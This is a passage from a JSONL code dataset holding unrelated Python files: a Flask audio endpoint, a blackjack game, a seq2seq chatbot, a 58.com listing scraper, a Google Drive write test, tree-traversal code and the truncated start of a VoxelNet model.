['GET'])\n@app.route('/api/get_messages', methods = ['GET'])\n\ndef get_messages():\n# def get_messages(filename):\n\n # json = request.get_json()\n # if json['user'] == \"larry\":\n # return jsonify({'messages':['test1', 'test2']})\n\n record()\n save(WAVE_OUTPUT_FILENAME)\n ans = classify(WAVE_OUTPUT_FILENAME)\n return jsonify(ans)\n","sub_path":"miniFlask/rumblemini.py","file_name":"rumblemini.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"445757460","text":"from card import Card\nfrom deck import Deck\nfrom player import Player\nfrom dealer import Dealer\nfrom interface import Interface\nimport sys\n\nclass Game:\n \"\"\"Run the main Blackjack game loop\n\n Responsibilities:\n * Starts Game\n * Starts New Hand if Player has $\n * Evaluate who wins and loses\n * Pays out bets\n\n Collaborators:\n * Card & Deck\n * Player & Dealer\n * Interface for input & output\n \"\"\"\n\n def __init__(self):\n self.interface = Interface()\n\n def game_start(self):\n self.player = Player()\n self.dealer = Dealer()\n\n\n def start_hand(self):\n self.player.bank -= 10\n self.deck = Deck()\n self.deck.shuffle_deck()\n self.player.take_a_hit(self.deck)\n self.dealer.take_a_hit(self.deck)\n self.player.take_a_hit(self.deck)\n self.dealer.take_a_hit(self.deck)\n self.interface.show_current(self.player, self.dealer)\n\n def blackjack_check(self):\n if self.dealer.blackjack():\n if self.player.blackjack():\n self.interface.show_final(self.player, self.dealer)\n self.player.bank += 10\n self.interface.you_push(self.player)\n #self.clear_hands()\n return False#Hand is over\n else:\n self.interface.show_final(self.player, self.dealer)\n self.interface.you_lose(self.player)\n #self.clear_hands()\n return False#Hand is over\n elif self.player.blackjack():\n self.player.bank += 25\n self.interface.blackjack(self.player)\n #self.clear_hands()\n return False#Hand is over\n\n def player_turn(self):##Come back to this\n while True:\n if self.interface.player_choice(self.player, self.deck):\n self.interface.show_current(self.player, self.dealer)\n return True#if player stands\n self.interface.show_current(self.player, self.dealer)\n if self.player.hand_value() > 21:\n self.interface.you_lose(self.player)\n self.clear_hands()\n return False#end hand\n\n\n def dealer_turn(self):\n while True:\n self.interface.show_dealer_hand(self.dealer)\n self.interface.show_dealer_total(self.dealer)\n if self.dealer.hand_value() <= 16:\n self.dealer.take_a_hit(self.deck)\n return True\n elif self.dealer.hand_value() >= 17:\n return False\n\n\n def win_loss_check(self):\n self.interface.show_final(self.player, self.dealer)\n if self.dealer.hand_value() > 21:\n self.player.bank += 20\n self.interface.you_win(self.player)\n self.clear_hands()\n elif self.dealer.hand_value() > self.player.hand_value():\n self.interface.you_lose(self.player)\n self.clear_hands()\n elif self.dealer.hand_value() == self.player.hand_value():\n self.player.bank += 10\n self.interface.you_push(self.player)\n self.clear_hands()\n else:\n self.player.bank += 20\n self.interface.you_win(self.player)\n self.clear_hands()\n\n def check_bank(self, player):\n if self.player.bank > 0:\n print(\"Time to play a new hand\")\n else:\n self.interface.no_money(self)\n return sys.exit\n\n def clear_hands(self):\n del self.player.hand[:]\n del self.dealer.hand[:]\n\n def main_game(self):\n self.interface.welcome_message()\n self.game_start()\n while True:\n self.start_hand()\n 
while True:\n self.blackjack_check()\n self.player_turn()\n self.dealer_turn()\n self.win_loss_check()\n self.clear_hands()\n self.check_bank(self.player)\n break\n\nif __name__ == \"__main__\":\n Game().main_game() # main_game is a method, so instantiate Game first; the bare main_game() raised NameError\n","sub_path":"blackjack/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"554123154","text":"\"\"\"\nCreated on Dec 1, 2017\n\n@author: mjiang\nming.jiang@epfl.ch\n\"\"\"\n\nimport numpy as np\n\n\ndef pow_method(A, At, im_size, tol, max_iter, verbose=False):\n \"\"\"\n Computes the spectral radius (maximum eigen value) of the operator A\n \n :param A: function handle of direct operator\n :param At: function handle of adjoint operator\n :param im_size: size of the image\n :param tol: tolerance of the error, stopping criterion\n :param max_iter: max iteration\n :return: spectral radius of the operator\n \"\"\"\n if len(im_size) == 2:\n x = np.random.randn(im_size[0], im_size[1])\n elif len(im_size) == 3:\n x = np.random.randn(im_size[0], im_size[1], im_size[2])\n x /= np.linalg.norm(x)\n init_val = 1\n \n for it in np.arange(max_iter):\n y = A(x)\n x = At(y)\n val = np.linalg.norm(x)\n rel_var = np.abs(val-init_val) / init_val\n if rel_var < tol:\n break\n init_val = val\n x /= val\n\n if verbose:\n print(\"Iteration: \", it, \", val: \", val)\n \n return val\n","sub_path":"tools/maths.py","file_name":"maths.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"605859854","text":"from sys import platform\nimport shutil\nimport os.path\nfrom os import path\n\nif platform == \"linux\" or platform == \"linux2\":\n from IPython.core.display import display\n path = str(\"/content/pracaMgr\")\nelif platform == \"darwin\":\n path = str(\"./\")\n # from google.colab import drive\n # drive.mount('/content/drive', force_remount=True)\nelif platform == \"win32\":\n path = str(\"../\")\n\n\"\"\"\nScript that verifies the connection to Google Drive works.\nOn any error, the whole training/test run on Google Colab is stopped.\nThe test creates a throwaway file, exports it to Google Drive, and then tries to delete it.\n\"\"\"\n\nworking_directory = os.getcwd()\nabsolute_path = working_directory + '/Example_file.txt'\n\n# Create example file\nwith open(absolute_path, \"w\") as f:\n print(\"This is a test file\", file=f)\n\n# Check if the file was created:\ntry:\n os.path.exists(absolute_path)\nexcept OSError as e:\n print(\"File is not created correctly\")\n raise\n\ntry:\n # Try to copy the file to Google Drive\n shutil.copy(absolute_path, \"/content/drive/My Drive/pracaMgr/Weights/Example_file.txt\")\n try:\n os.path.exists(\"/content/drive/My Drive/pracaMgr/Weights/Example_file.txt\")\n print(\"Following path exists, file was successfully exported\")\n os.remove(\"/content/drive/My Drive/pracaMgr/Weights/Example_file.txt\")\n except Exception as e:\n print(\"File is not on Google Drive!\")\n print(e)\n raise\nexcept OSError as e:\n print(\"Problems with a path - it does not exist\")\n print(absolute_path)\n raise\nexcept Exception as e:\n print('Saving was not possible, sorry')\n print(e)\n raise\nfinally:\n os.remove(\"Example_file.txt\")\n","sub_path":"GoogleDriveChecker.py","file_name":"GoogleDriveChecker.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"49303698","text":"'''\nUnit tests for data.py\n'''\n\nimport unittest\nimport os\nimport numpy as np\nfrom matplotlib.mlab import csv2rec\nfrom macroeco.data import DataTable, Metadata\n\nclass TestDataTable(unittest.TestCase):\n\n def setUp(self):\n '''Write test xytable csv file.'''\n\n self.xyfile1 = open('xyfile1.csv','w')\n self.xyfile1.write('''spp_code, x, y, count\n 0, 0, 0, 1\n 0, 0, 0, 2\n 0, 0, 1, 1\n 1, 0, 0, 1\n 1, 1, 0, 2''')\n self.xyfile1.close()\n self.xyarr1 = csv2rec('xyfile1.csv')\n\n def tearDown(self):\n os.remove('xyfile1.csv')\n\n def test_error_if_file_type_not_csv(self):\n self.assertRaises(TypeError, DataTable, 'file.txt')\n \n def test_meta_None_if_no_meta_file(self):\n xy1 = DataTable('xyfile1.csv')\n self.assertEqual(xy1.meta, None)\n\n def test_table_is_correct(self):\n xy1 = DataTable('xyfile1.csv')\n np.testing.assert_array_equal(xy1.table, self.xyarr1)\n\n def test_get_subtable(self):\n xy1 = DataTable('xyfile1.csv')\n xy1.meta = {('x', 'maximum'): 1,\n ('x', 'minimum'): 0,\n ('x', 'precision'): 1,\n ('y', 'maximum'): 1,\n ('y', 'minimum'): 0,\n ('y', 'precision'): 1}\n\n # Whole table\n sub = xy1.get_subtable({})\n np.testing.assert_array_equal(sub, self.xyarr1)\n\n sub = xy1.get_subtable({'x': [('>=', 0),('<', 2)], 'y': [('>=', 0),\n ('<', 2)]})\n np.testing.assert_array_equal(sub, self.xyarr1)\n\n # Subset\n sub = xy1.get_subtable({'spp_code': ('==', 0)})\n np.testing.assert_array_equal(sub, self.xyarr1[0:3])\n\n sub = xy1.get_subtable({'spp_code': ('==', 0), 'x': ('>', 0)})\n np.testing.assert_array_equal(sub, self.xyarr1[2])\n\nclass TestMetadata(unittest.TestCase):\n \n def setUp(self):\n '''Write test data and metadata file.'''\n\n self.xyfile1 = open('xyfile1.csv','w')\n self.xyfile1.write('''x, y\n 0, 0\n 0, 0\n 0, 0\n 1, 0\n 1, 1''')\n self.xyfile1.close()\n\n self.xymeta = open('xyfile1.xml','w')\n self.xymeta.write('''\n\n\nUnittest XML \n\nNA\n-79.5915\n-79.5915\n8.975\n10\n\n\n\n\ny\ncell\nx0.0\n99.90.1\n''')\n self.xymeta.close()\n\n def tearDown(self):\n os.remove('xyfile1.csv')\n os.remove('xyfile1.xml')\n\n def test_metadata_correct_read(self):\n # Should read values correctly from sample file, including None for\n # attributes that do not exist and elements that do not exist.\n xy1 = DataTable('xyfile1.csv')\n self.assertEqual(len(xy1.meta), 8)\n self.assertEqual(xy1.meta, {('x', 'maximum'): 99.9,\n ('x', 'minimum'): 0.0,\n ('x', 'precision'): 0.1,\n ('x', 'type'): 'interval',\n ('y', 'maximum'): None,\n ('y', 'minimum'): None,\n ('y', 'precision'): None,\n ('y', 'type'): 'ordinal'})\n\n def test_physical_coverage(self):\n meta = Metadata('xyfile1.csv', [])\n edges = meta.get_physical_coverage()\n self.assertEqual(edges, [8.975, -79.5915, 10, -79.5915])\n\n def test_title(self):\n meta = Metadata('xyfile1.csv', [])\n self.assertEqual(meta.get_title(), 'Unittest XML')\n","sub_path":"test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"54667369","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\n#\n# 代码中的类名、方法名、参数名已经指定,请勿修改,直接返回方法规定的值即可\n#\n#\n# @param pRoot TreeNode类\n# @return int整型二维数组\n#\nclass Solution:\n def Print(self, pRoot: TreeNode):\n # write code here\n ans = list()\n if not pRoot:\n return 
ans\n stack = [[pRoot], []]\n cur = 0\n nex = 1\n cur_ans = list()\n while stack[0] or stack[1]:\n node = stack[cur].pop(-1)\n cur_ans.append(node.val)\n if cur == 0:\n if node.left:\n stack[nex].append(node.left)\n if node.right:\n stack[nex].append(node.right)\n else:\n if node.right:\n stack[nex].append(node.right)\n if node.left:\n stack[nex].append(node.left)\n if not stack[cur]:\n ans.append(cur_ans)\n cur_ans = list()\n cur = 1 - cur\n nex = 1 - nex\n\n return ans\n\n\nclass Solution2:\n def zigzagLevelOrder(self, root: TreeNode) -> 'List[List[int]]':\n if not root:\n return []\n\n ans = []\n stacks = [[], []]\n current = 0\n next = 1\n stacks[current].append(root)\n\n while stacks[current]:\n # NOTE: iterative variant that drains one whole level per pass,\n # walking the current stack in reverse to produce the zigzag order\n tempAns = []\n for idx in range(len(stacks[current]) - 1, -1, -1):\n node = stacks[current][idx]\n tempAns.append(node.val)\n\n if current == 0:\n if node.left:\n stacks[next].append(node.left)\n if node.right:\n stacks[next].append(node.right)\n else:\n if node.right:\n stacks[next].append(node.right)\n if node.left:\n stacks[next].append(node.left)\n\n stacks[current].clear()\n current = 1 - current\n next = 1 - next\n ans.append(tempAns)\n\n return ans\n\n\n# scratch demo: two equivalent ways to sort a dict by value\na = {'b':1, 'b6y':166,'bg':1,'c':311,'ba':2,'be':6,'bd':10}\n\nimport operator\na1 = sorted(a.items(), key=operator.itemgetter(1))\na2 = sorted(a.items(), key=lambda x: x[1])\n\nprint(a1, '\\n', a2)","sub_path":"solutions/tree/problem103_Binary Tree Zigzag Level Order Traversal.py","file_name":"problem103_Binary Tree Zigzag Level Order Traversal.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"63017132","text":"#encoding=utf-8\nimport math\nimport os\nimport random\nimport sys\nimport time\n\nimport numpy as np\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport tensorflow as tf\n\nfrom data_utils import *\nfrom seq2seq_model import *\nimport codecs\n\n\ntf.app.flags.DEFINE_float(\"learning_rate\", 0.01, \"Learning rate.\")\ntf.app.flags.DEFINE_float(\"learning_rate_decay_factor\", 0.99,\n \"Learning rate decays by this much.\")\ntf.app.flags.DEFINE_float(\"max_gradient_norm\", 5.0,\n \"Clip gradients to this norm.\")\ntf.app.flags.DEFINE_integer(\"batch_size\", 64,\n \"Batch size to use during training.\")\ntf.app.flags.DEFINE_integer(\"size\", 256, \"Size of each model layer.\")\ntf.app.flags.DEFINE_integer(\"num_layers\", 2, \"Number of layers in the model.\")\ntf.app.flags.DEFINE_integer(\"source_vocab_size\", 1000, \"source vocabulary size.\")\ntf.app.flags.DEFINE_integer(\"target_vocab_size\", 1000, \"target vocabulary size.\")\ntf.app.flags.DEFINE_string(\"train_dir\", \"./tmp/\", \"Training directory.\")\ntf.app.flags.DEFINE_string(\"vocab_path\", \"./tmp/\", \"Data directory\")\ntf.app.flags.DEFINE_string(\"data_path\", \"./tmp/\", \"Training directory.\")\ntf.app.flags.DEFINE_string(\"dev_data\", \"./tmp/\", 
\"Data directory\")\ntf.app.flags.DEFINE_integer(\"max_train_data_size\", 0,\n \"Limit on the size of training data (0: no limit).\")\ntf.app.flags.DEFINE_integer(\"steps_per_checkpoint\", 400,\n \"How many training steps to do per checkpoint.\")\ntf.app.flags.DEFINE_integer(\"beam_size\", 100,\n \"How many training steps to do per checkpoint.\")\ntf.app.flags.DEFINE_boolean(\"beam_search\", False,\n \"Set to True for beam_search.\")\ntf.app.flags.DEFINE_boolean(\"decode\", False,\n \"Set to True for interactive decoding.\")\ntf.app.flags.DEFINE_boolean(\"attention\", False,\n \"Set to True for interactive decoding.\")\ntf.app.flags.DEFINE_boolean(\"self_test\", False,\n \"Run a self-test if this is set to True.\")\n\nFLAGS = tf.app.flags.FLAGS\n\n_buckets = [(20, 50), (30, 80), (40, 120), (40, 150)]\n\n# 读取数据\ndef read_chat_data(data_path, word_index_ask, word_index_answer):\n\n f = open(data_path, 'r')\n data_set = [[] for _ in _buckets]\n\n for line in f:\n line = line.replace('\\n', '').strip().split('|')\n\n source = line[1].strip()\n target = line[0].strip()\n\n source_ids = [int(x) for x in sentence_to_token_ids(source, word_index_ask)]\n target_ids = [int(x) for x in sentence_to_token_ids(target, word_index_answer)]\n\n target_ids.append(EOS_ID)\n\n for bucket_id, (source_size, target_size) in enumerate(_buckets):\n if len(source_ids) < source_size and len(target_ids) < target_size:\n data_set[bucket_id].append([source_ids, target_ids])\n break\n return data_set\n\n\n\ndef create_model(session, forward_only, beam_search, beam_size = 10, attention = True):\n\n model = Seq2SeqModel(\n FLAGS.source_vocab_size, FLAGS.target_vocab_size, _buckets,\n FLAGS.size, FLAGS.num_layers, FLAGS.max_gradient_norm, FLAGS.batch_size,\n FLAGS.learning_rate, FLAGS.learning_rate_decay_factor,\n forward_only=forward_only, beam_search=beam_search, beam_size=beam_size, attention=attention)\n\n ckpt = tf.train.get_checkpoint_state(FLAGS.train_dir)\n\n if ckpt and tf.gfile.Exists(ckpt.model_checkpoint_path):\n print(\"Reading model parameters from %s\" % ckpt.model_checkpoint_path)\n model.saver.restore(session, ckpt.model_checkpoint_path)\n else:\n print(\"Created model with fresh parameters.\")\n session.run(tf.initialize_all_variables())\n return model\n\ndef create_models(path, en_vocab_size, session, forward_only, beam_search, beam_size = 10, attention = True):\n model = Seq2SeqModel(\n FLAGS.source_vocab_size, FLAGS.target_vocab_size, _buckets,\n FLAGS.size, FLAGS.num_layers, FLAGS.max_gradient_norm, FLAGS.batch_size,\n FLAGS.learning_rate, FLAGS.learning_rate_decay_factor,\n forward_only=forward_only, beam_search=beam_search, beam_size=beam_size, attention=attention)\n print(FLAGS.train_dir)\n ckpt = tf.train.get_checkpoint_state(path)\n\n # ckpt.model_checkpoint_path =\"./big_models/chat_bot.ckpt-183600\"\n # print ckpt.model_checkpoint_path\n if ckpt and tf.gfile.Exists(ckpt.model_checkpoint_path):\n print(\"Reading model parameters from %s\" % ckpt.model_checkpoint_path)\n model.saver.restore(session, ckpt.model_checkpoint_path)\n else:\n print(\"Created model with fresh parameters.\")\n session.run(tf.initialize_all_variables())\n return model\n\n\ndef train():\n\n data_path = 'data/test_w.txt'\n dev_data = 'data/test_v.txt'\n\n beam_search = False\n beam_size = 10\n attention = FLAGS.attention\n\n normalize_digits = True\n\n dim, dictionary_source, dictionary_target, index_word_ask, word_index_ask, \\\n index_word_answer, word_index_answer = create_vocabulary(data_path)\n\n 
FLAGS.source_vocab_size = len(dictionary_source)\n FLAGS.target_vocab_size = len(dictionary_target)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n # Create model.\n print(\"Creating %d layers of %d units.\" % (FLAGS.num_layers, FLAGS.size))\n model = create_model(sess, False, beam_search=beam_search, beam_size=beam_size, attention=attention)\n\n train_set = read_chat_data(data_path, word_index_ask, word_index_answer)\n dev_set = read_chat_data(dev_data, word_index_ask, word_index_answer)\n\n train_bucket_sizes = [len(train_set[b]) for b in xrange(len(_buckets))]\n train_total_size = float(sum(train_bucket_sizes))\n\n # A bucket scale is a list of increasing numbers from 0 to 1 that we'll use\n # to select a bucket. Length of [scale[i], scale[i+1]] is proportional to\n # the size if i-th training bucket, as used later.\n train_buckets_scale = [sum(train_bucket_sizes[:i + 1]) / train_total_size\n for i in xrange(len(train_bucket_sizes))]\n\n # This is the training loop.\n step_time, loss = 0.0, 0.0\n current_step = 0\n previous_losses = []\n while True:\n # Choose a bucket according to data distribution. We pick a random number\n # in [0, 1] and use the corresponding interval in train_buckets_scale.\n # print \"Started\"\n random_number_01 = np.random.random_sample()\n bucket_id = min([i for i in xrange(len(train_buckets_scale))\n if train_buckets_scale[i] > random_number_01])\n\n # Get a batch and make a step.\n start_time = time.time()\n encoder_inputs, decoder_inputs, target_weights = model.get_batch(\n train_set, bucket_id)\n\n _, step_loss, _ = model.step(sess, encoder_inputs, decoder_inputs,\n target_weights, bucket_id, False, beam_search)\n\n step_time += (time.time() - start_time) / FLAGS.steps_per_checkpoint\n loss += step_loss / FLAGS.steps_per_checkpoint\n current_step += 1\n\n # Once in a while, we save checkpoint, print statistics, and run evals.\n # steps_per_checkpoint 400\n\n if current_step % FLAGS.steps_per_checkpoint == 0:\n # Print statistics for the previous epoch.\n print(\"Running epochs\")\n perplexity = math.exp(loss) if loss < 300 else float('inf')\n print(\"global step %d learning rate %.4f step-time %.2f perplexity \"\n \"%.2f\" % (model.global_step.eval(), model.learning_rate.eval(),\n step_time, perplexity))\n\n # # Decrease learning rate if no improvement was seen over last 3 times.\n if len(previous_losses) > 2 and loss > max(previous_losses[-3:]):\n sess.run(model.learning_rate_decay_op)\n\n previous_losses.append(loss)\n # # Save checkpoint and zero timer and loss.\n checkpoint_path = os.path.join(FLAGS.train_dir, \"chat_bot.ckpt\")\n model.saver.save(sess, checkpoint_path, global_step=model.global_step)\n step_time, loss = 0.0, 0.0\n\n # # Run evals on development set and print their perplexity.\n for bucket_id in xrange(len(_buckets)):\n if len(dev_set[bucket_id]) == 0:\n print(\" eval: empty bucket %d\" % (bucket_id))\n continue\n encoder_inputs, decoder_inputs, target_weights = model.get_batch(\n dev_set, bucket_id)\n _, eval_loss, _ = model.step(sess, encoder_inputs, decoder_inputs,\n target_weights, bucket_id, True, beam_search)\n eval_ppx = math.exp(eval_loss) if eval_loss < 300 else float('inf')\n print(\" eval: bucket %d perplexity %.2f\" % (bucket_id, eval_ppx))\n sys.stdout.flush()\n\ndef decode():\n with tf.Session() as sess:\n\n # Load vocabularies.\n data_path = 'data/test_w.txt'\n\n dim, dictionary_source, dictionary_target, index_word_ask, word_index_ask, \\\n 
index_word_answer, word_index_answer = create_vocabulary(data_path)\n\n # Create model and load parameters.\n beam_size = FLAGS.beam_size\n beam_search = FLAGS.beam_search\n attention = FLAGS.attention\n\n FLAGS.source_vocab_size = len(dictionary_source)\n FLAGS.target_vocab_size = len(dictionary_target)\n\n\n model = create_model(sess, True, beam_search=beam_search, beam_size=beam_size, attention=attention)\n model.batch_size = 1 # We decode one sentence at a time.\n\n\n # Decode from standard input.\n if beam_search:\n sys.stdout.write(\"> \")\n sys.stdout.flush()\n sentence = sys.stdin.readline()\n while sentence:\n # Get token-ids for the input sentence.\n token_ids = sentence_to_token_ids(sentence.replace('\\n', '').strip(), word_index_ask)\n\n print(token_ids)\n\n # Which bucket does it belong to?\n bucket_id = min([b for b in xrange(len(_buckets))\n if _buckets[b][0] > len(token_ids)])\n # Get a 1-element batch to feed the sentence to the model.\n encoder_inputs, decoder_inputs, target_weights = model.get_batch(\n {bucket_id: [(token_ids, [])]}, bucket_id)\n # Get output logits for the sentence.\n # print bucket_id\n path, symbol, output_logits = model.step(sess, encoder_inputs, decoder_inputs,\n target_weights, bucket_id, True, beam_search)\n\n k = output_logits[0]\n paths = []\n for kk in range(beam_size):\n paths.append([])\n curr = list(range(beam_size))\n num_steps = len(path)\n for i in range(num_steps-1, -1, -1):\n for kk in range(beam_size):\n paths[kk].append(symbol[i][curr[kk]])\n curr[kk] = path[i][curr[kk]]\n recos = set()\n\n print(paths)\n print(\"Replies --------------------------------------->\")\n for kk in range(beam_size):\n foutputs = [int(logit) for logit in paths[kk][::-1]]\n\n # If there is an EOS symbol in outputs, cut them at that point.\n if EOS_ID in foutputs:\n # # print outputs\n foutputs = foutputs[:foutputs.index(EOS_ID)]\n print(foutputs)\n rec = \" \".join([str(index_word_answer[output]) for output in foutputs])\n if rec not in recos:\n recos.add(rec)\n print(rec)\n\n print(\"> \", \"\")\n sys.stdout.flush()\n sentence = sys.stdin.readline()\n else:\n sys.stdout.write(\"> \")\n sys.stdout.flush()\n sentence = sys.stdin.readline()\n\n while sentence:\n # Get token-ids for the input sentence.\n token_ids = sentence_to_token_ids(sentence.replace('\\n', '').strip(), word_index_ask)\n\n # Which bucket does it belong to?\n bucket_id = min([b for b in xrange(len(_buckets))\n if _buckets[b][0] > len(token_ids)])\n # for loc in locs:\n # Get a 1-element batch to feed the sentence to the model.\n encoder_inputs, decoder_inputs, target_weights = model.get_batch(\n {bucket_id: [(token_ids, [],)]}, bucket_id)\n\n _, _, output_logits = model.step(sess, encoder_inputs, decoder_inputs,\n target_weights, bucket_id, True, beam_search)\n # This is a greedy decoder - outputs are just argmaxes of output_logits.\n\n outputs = [int(np.argmax(logit, axis=1)) for logit in output_logits]\n print(len(output_logits))\n\n for j in range(len(output_logits)):\n print(len(output_logits[j][0]))\n\n # If there is an EOS symbol in outputs, cut them at that point.\n\n print(outputs)\n if EOS_ID in outputs:\n # print outputs\n outputs = outputs[:outputs.index(EOS_ID)]\n\n print(\" \".join([tf.compat.as_str(index_word_answer[output]) for output in outputs]))\n print(\"> \", \"\")\n sys.stdout.flush()\n sentence = sys.stdin.readline()\n\n\ndef main(_):\n if FLAGS.decode:\n decode()\n else:\n train()\n\nif __name__ == \"__main__\":\n 
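# tf.app.run() parses flags and calls main(), which dispatches to decode() or train()\n 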
tf.app.run()\n","sub_path":"neural_conversation_model.py","file_name":"neural_conversation_model.py","file_ext":"py","file_size_in_byte":13853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"350509918","text":"#encoding:utf-8\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\n\n# fetch the list of listing URLs from the start page\ndef get_url_lists(starturl):\n start_web = requests.get(starturl)\n soup = BeautifulSoup(start_web.text,'lxml')\n webs = soup.select('td.t > a.t')\n url_lists = [web.get('href') for web in webs]\n return url_lists\n\n# scrape the fields of interest from a single listing page\ndef get_web_content(url):\n # parse the page content\n web_content = requests.get(url)\n time.sleep(3)\n soup = BeautifulSoup(web_content.text,'lxml')\n titles = soup.select('h1')\n publish_times = soup.select('li.time')\n prices = soup.select('div.su_con > span')\n sale_types = soup.select('div.num_tan_text > span:nth-of-type(1)') # the span position matters: nth-of-type(1) is the first span tag\n districts = soup.select('span.c_25d > a')\n categorys = soup.select('span:nth-of-type(3) > a')\n for title,publish_time,price,sale_type,district,category in zip(titles,publish_times,prices,sale_types,districts,categorys):\n # the view counter is filled in by JS, so query the counter endpoint directly:\n url_split = url.split('&')\n url_id = url_split[-1][8:-2]\n browse_url='http://jst1.58.com/counter?infoid='+str(url_id)\n browse_content = requests.get(browse_url)\n soup1 = BeautifulSoup(browse_content.text,'lxml')\n browse_nums = str(soup1.p)\n browse_nums_list = browse_nums.split('.')\n browse_num = browse_nums_list[-1][6:-4]\n # label the seller type: '商家' (merchant) vs '个人' (individual)\n if(len(sale_type.get_text())==11):\n sale_type='商家'\n else:\n sale_type='个人'\n web_contents = {\n '商品标题':title.get_text(),\n '浏览量':browse_num,\n '发帖时间':publish_time.get_text(),\n '价格' : price.get_text(),\n '卖家类型' : sale_type,\n '区域' : district.get_text(),\n '类目' : category.get_text()\n }\n print(web_contents)\n\n# loop over every listing URL and scrape it\ndef urls_loop_get(urls):\n for url in urls:\n get_web_content(url)\n\nif __name__==\"__main__\":\n url = \"http://bj.58.com/pbdn/?PGTID=0d100000-0000-1121-f41b-137aeef068b7&ClickID=6\"\n urls=get_url_lists(url)\n urls_loop_get(urls)","sub_path":"week1大作业提交/huyongsheng/exercise_1.py","file_name":"exercise_1.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"196169981","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.init as init\nfrom torch.autograd import Variable\nimport yaml\nimport math\n\nyamlPath = \"configure.yaml\"\nf = open(yamlPath, 'r', encoding='utf-8')\nconf = f.read()\nconf_dict = yaml.safe_load(conf) \n\nif_cuda = True if conf_dict['if_cuda'] == 1 and torch.cuda.is_available() else False\nbatch_size = conf_dict['batch_size']\nrange_x=conf_dict['range_x']\nrange_y=conf_dict['range_y']\nrange_z=conf_dict['range_z']\nvox_depth = conf_dict['vox_d']\nvox_width = conf_dict['vox_w']\nvox_height = conf_dict['vox_h']\nanchor_per_pos = conf_dict['anchors_per_vox']\npt_thres_per_vox = conf_dict['pt_thres_per_vox']\n\nW = math.ceil((max(range_x)-min(range_x))/vox_width)\nH = math.ceil((max(range_y)-min(range_y))/vox_height)\nD = math.ceil((max(range_z)-min(range_z))/vox_depth)\n\nclass Conv3d(nn.Module):\n def __init__(self, in_channels, out_channels, k, s, p):\n super(Conv3d, self).__init__()\n self.conv = nn.Conv3d(in_channels, out_channels, kernel_size=k, stride=s, padding=p)\n self.bn = 
nn.BatchNorm3d(out_channels)\n \n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n return F.relu(x, inplace=True)\n \nclass Conv2d(nn.Module):\n def __init__(self,in_channels,out_channels,k,s,p, activation=True, batch_norm=True):\n super(Conv2d, self).__init__()\n self.conv = nn.Conv2d(in_channels,out_channels,kernel_size=k,stride=s,padding=p)\n if batch_norm:\n self.bn = nn.BatchNorm2d(out_channels)\n else:\n self.bn = None\n self.activation = activation\n def forward(self,x):\n x = self.conv(x)\n if self.bn is not None:\n x=self.bn(x)\n if self.activation:\n return F.relu(x,inplace=True)\n else:\n return x\n\nclass FCN(nn.Module):\n\n def __init__(self,cin,cout):\n super(FCN, self).__init__()\n self.cout = cout\n self.linear = nn.Linear(cin, cout)\n self.bn = nn.BatchNorm1d(cout)\n\n def forward(self,x):\n # KK is the stacked k across batch\n K, T, _ = x.shape\n x = self.linear(x.view(K*T,-1))\n x = self.bn(x)\n x = F.relu(x)\n return x.view(K,T,-1)\n\n\n# Voxel Feature Encoding layer\nclass VFE(nn.Module):\n\n def __init__(self,cin,cout):\n super(VFE, self).__init__()\n self.units = int(cout / 2)\n self.fcn = FCN(cin,self.units)\n\n def forward(self, x, mask):\n # point-wise feauture\n pointwise = self.fcn(x)\n aggregated = torch.max(pointwise,1)[0]\n repeated = aggregated.unsqueeze(1).repeat(1,pt_thres_per_vox,1)\n pointwise_concat = torch.cat((pointwise,repeated),dim=2)\n mask = mask.unsqueeze(2).repeat(1, 1, self.units * 2)\n return pointwise_concat * mask.float()\n\n\n# Stacked Voxel Feature Encoding\nclass SVFE(nn.Module):\n def __init__(self):\n super(SVFE, self).__init__()\n self.vfe_1 = VFE(7,32)\n self.vfe_2 = VFE(32,128)\n self.fcn = FCN(128,128)\n def forward(self, x):\n mask = torch.ne(torch.max(x,2)[0], 0)\n x = self.vfe_1(x, mask)\n x = self.vfe_2(x, mask)\n x = self.fcn(x)\n # element-wise max pooling\n x = torch.max(x,1)[0]\n return x\n\n# Convolutional Middle Layer\nclass ConvoMidLayer(nn.Module):\n def __init__(self):\n super(ConvoMidLayer, self).__init__()\n self.conv3d_1 = Conv3d(128, 64, 3, s=(2, 1, 1), p=(1, 1, 1))\n self.conv3d_2 = Conv3d(64, 64, 3, s=(1, 1, 1), p=(0, 1, 1))\n self.conv3d_3 = Conv3d(64, 64, 3, s=(2, 1, 1), p=(1, 1, 1))\n\n def forward(self, x):\n x = self.conv3d_1(x)\n x = self.conv3d_2(x)\n x = self.conv3d_3(x)\n x = x.permute(0, 2, 3, 4, 1)\n x = x.reshape(-1, H, W, 128)\n return x\n\n# Region Proposal Network\nclass RPN(nn.Module):\n def __init__(self):\n super(RPN, self).__init__()\n self.block_1 = nn.Sequential(Conv2d(128, 128, 3, 2, 1),\n Conv2d(128, 128, 3, 1, 1),\n Conv2d(128, 128, 3, 1, 1),\n 